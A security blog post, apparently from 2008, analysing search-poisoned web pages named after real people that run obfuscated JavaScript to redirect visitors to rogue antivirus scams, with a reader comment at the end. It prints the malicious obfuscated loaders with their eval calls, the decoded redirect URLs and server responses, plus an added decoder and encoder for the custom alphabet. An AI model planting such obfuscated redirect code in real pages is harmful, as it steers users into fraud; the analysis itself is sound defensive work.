This was quite interesting. One of my co-workers just learned that there is a malicious HTML page with his name on it! When I downloaded the page we realized that it was not a targeted attack, but a different variant of the malicious pages I reported in my MSN malicious results post.
This server actually had 3179 other html pages, each one with a name starting with Ryan-. The bad guys probably used a robot to collect information from web pages.
The script looks like the one reported before:
function zrwe(yry, dtj) {
  if (!dtj) { dtj = 'SDedpfE96wCVaFkzrvK4;JhRtHNyo21{LsTn}-I+&38?QAucjlbGW*XBgmZ).Pq0'; } // 64-symbol custom base64 alphabet
  var y; var OR = '';
  for (var vadz = 0; vadz < yry.length; vadz += 4) {
    // four alphabet symbols -> one 24-bit value -> three characters
    y = (dtj.indexOf(yry.charAt(vadz)) & 63) << 18 | (dtj.indexOf(yry.charAt(vadz + 1)) & 63) << 12 | (dtj.indexOf(yry.charAt(vadz + 2)) & 63) << 6 | dtj.indexOf(yry.charAt(vadz + 3)) & 63;
    OR += String.fromCharCode((y & 16711680) >> 16, (y & 65280) >> 8, y & 255);
  }
  eval(OR.substring(0, OR.length - 3)); // drops three trailing filler characters, then runs the result
}
zrwe('2X-uHEPBVIlctXfWNhPuzhJutXP}HJJKKKLTN9vWod&cVB2B2bmcyIl3yIJ}HRv-tBrutXPAVX-uVIF+N4.Bw+vGNG*82hlmVRvsoXQWVR6gFT*3Hda*VRrlke*ctI.gNTHW1RD-zhjIoXJcoIJIzK6?HhmnyXv-JJwwrXPAoEPuHhmWCEvctBJAHhmWV+w-HIJboIJbCKQTw+DsoIfAHRv-onW}NXJm2XPbHeHGH4W}oX;I2R6PaKH6JfvrR*wfv}JKvJ6P6TA-yIFcHEJJ;}-dyX*jyXm-y+r&HEPn2h*-y+ruJJwaCKQTwIv-HIf*y9v{NXJm2XPbHd*thfLTC4QL6eSL6SSS');
And it translates into:
window.location=encodeURI("hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=XXX");
The redirection has changed to a different server:
hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref=
Right now this is directing you to antivirus2008scanner.com, one of the multiple variants of rogue antivirus on the market. scan.wspscanner.com is another possible destination.
How difficult is it to get to one of those pages?
Take Google and do a search for “Ryan mauskopf” (click on the image to see it full size). Ryan Mauskopf is not my friend; I picked one of the random names…

Yep, the fourth result is a bad one. Ryan Mauskopf is one of the other 3179 pages residing in that server’s folder. The hosting company has been notified, by the way, so don’t be surprised if you find nothing when you go there.
I only saw pages starting with “Ryan” on this server, but there could potentially be other pages for different names. Here is a sample of the page names…
So I took some of the page names and went fishing. Try with lamparek.html on MSN LiveSearch (Google also returns results).
We got 3 hits! Another ryan-lamparek and a rick-lamparek.html. I downloaded the pages from the user.aol.com link; there were 2001 of them. Some name samples:
These ones are a bit different: the script is not included in the page itself but embedded later from a separate file:
<input type="hidden" id="mymenu" value="Glasgow Umarex Red Hawk"> <script src="menu.js"></script>
And our script is:
var text = document.getElementById("mymenu").value; // the page name from the hidden input
var tt; var kk; var mm; kk = ""; tt = "w|nd^w$l^c#[|^n;'([[*)!!b>s[s>#rc(w^rld$|nf^'";
// simple substitution cipher: each marker character maps back to one letter
for (var i = 0; i < tt.length + 1; i++) { mm = tt.substring(i, i + 1);
  if (mm == "(") mm = "h"; if (mm == "*") mm = "p"; if (mm == "!") mm = "/"; if (mm == ">") mm = "e"; if (mm == "$") mm = ".";
  if (mm == "[") mm = "t"; if (mm == "#") mm = "a"; if (mm == "^") mm = "o"; if (mm == "]") mm = "?"; if (mm == "@") mm = "k";
  if (mm == "{") mm = "&"; if (mm == ")") mm = ":"; if (mm == ";") mm = "="; if (mm == "|") mm = "i"; if (mm == " ") mm = "+"; kk = kk + mm; }
eval(kk); // runs the rebuilt window.location assignment
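Both decoders above (the zrwe() custom-alphabet base64 and the menu.js substitution table), rewritten as an added example that is not code from the original post: each one returns the string it builds instead of eval()-ing it, which is the safe way to recover where a page redirects. The alphabet and the substitution string are the page's own; the encoder and the short sample input are constructed here.

```javascript
// Added example, not code from the original post: both decoders above rewritten
// to RETURN the string they build instead of eval()-ing it, which is the safe
// way to recover what they redirect to. The alphabet and the substitution
// string are taken from the page; the encoder and the short test input are
// constructed here.
const ALPHABET = 'SDedpfE96wCVaFkzrvK4;JhRtHNyo21{LsTn}-I+&38?QAucjlbGW*XBgmZ).Pq0';

// zrwe(): base64 over a custom alphabet. Four symbols -> 24 bits -> three bytes;
// like the original, the last three decoded bytes are discarded.
function decodeZrwe(payload, alphabet = ALPHABET) {
  let out = '';
  for (let i = 0; i < payload.length; i += 4) {
    const y = (alphabet.indexOf(payload.charAt(i)) & 63) << 18 |
              (alphabet.indexOf(payload.charAt(i + 1)) & 63) << 12 |
              (alphabet.indexOf(payload.charAt(i + 2)) & 63) << 6 |
              (alphabet.indexOf(payload.charAt(i + 3)) & 63);
    out += String.fromCharCode((y & 0xff0000) >> 16, (y & 0xff00) >> 8, y & 0xff);
  }
  return out.substring(0, out.length - 3); // page: eval(OR.substring(0, OR.length-3))
}

// Inverse of decodeZrwe, constructed for the round trip (the real obfuscator is
// not on the page): pad to three-byte groups with spaces, then append the three
// filler bytes the decoder throws away.
function encodeZrwe(text, alphabet = ALPHABET) {
  let data = text;
  while (data.length % 3 !== 0) data += ' ';
  data += '\u0000\u0000\u0000';
  let out = '';
  for (let i = 0; i < data.length; i += 3) {
    const y = (data.charCodeAt(i) & 255) << 16 |
              (data.charCodeAt(i + 1) & 255) << 8 | (data.charCodeAt(i + 2) & 255);
    out += alphabet[(y >> 18) & 63] + alphabet[(y >> 12) & 63] +
           alphabet[(y >> 6) & 63] + alphabet[y & 63];
  }
  return out;
}

// menu.js: the if-chain is a per-character substitution table, written here as a map.
const SUBST = { '(': 'h', '*': 'p', '!': '/', '>': 'e', '$': '.', '[': 't', '#': 'a',
                '^': 'o', ']': '?', '@': 'k', '{': '&', ')': ':', ';': '=', '|': 'i', ' ': '+' };
const MENU_JS_TT = "w|nd^w$l^c#[|^n;'([[*)!!b>s[s>#rc(w^rld$|nf^'";

function decodeMenuJs(tt) {
  let kk = '';
  for (const ch of tt) kk += (ch in SUBST) ? SUBST[ch] : ch;
  return kk; // page: eval(kk)
}
```

On the page's own string, decodeMenuJs(MENU_JS_TT) gives a window.location assignment pointing at bestsearchworld.info, the host that answers with the 302 shown further down.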
See how it passes the page name as a parameter? Without it, you are going nowhere… Anyway, this is where it actually goes: the rebuilt string is window.location='hxxp://bestsearchworld.info'. And this is our first stop:
hxxp://www.globalfreesearch.com/r.php
But they do not want us there…
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="hxxp://www.globalfreesearch.com/r.php">here</A>.<P>
<HR>
<ADDRESS>Apache/1.3.39 Server at bestsearchworld.info Port 80</ADDRESS>
</BODY></HTML>
So we keep moving…
HTTP/1.1 301 Moved Permanently
Date: Fri, 25 Jul 2008 23:04:58 GMT
Server: Apache/1.3.39 (Unix) mod_perl/1.30 PHP/5.2.4 mod_ssl/2.8.30 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.4
Location: hxxp://bestsearchworld.info/z.html
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
Finally, we arrive somewhere… Wait! Our browser may be infected with danger virus NetSky.q. We need to download a newer version of Antivirus 2008!

If you click on Details, we get a complimentary scan courtesy of the guys from pc scanner online… (at least, today)
hxxp://pc-scanner-online.com/1/?xx=0&in=0&ag=0&end=1&g=0&affid=287&lid=501
Where at some point you will be pushed to install their AV, and pay.
What amazes me is the amount of work these guys put into their pages. If you want to see their different landing pages, replace the “1” after the .com/ with different numbers. Each one will take you to a different landing page, but they all look the same underneath. You can tell it’s all the same people doing it.
Anyway, more of the same. They are so easy to find on the internet that the number of infected servers has to be huge. In half an hour doing this blog post I found probably 10.000 infected pages…
Be safe out there.


Hi
For the last seven weeks, doing a Google search of my name brings up different sites that all link to antivirus2008scanner.com, either directly or after clicking my name. These sites seem legitimate and after a week or so they no longer come up when searching my name. Is antivirus2008scanner.com hijacking these pages? How do they get away with this? How can I stop them from using my name?
Thanks for your help,
Shel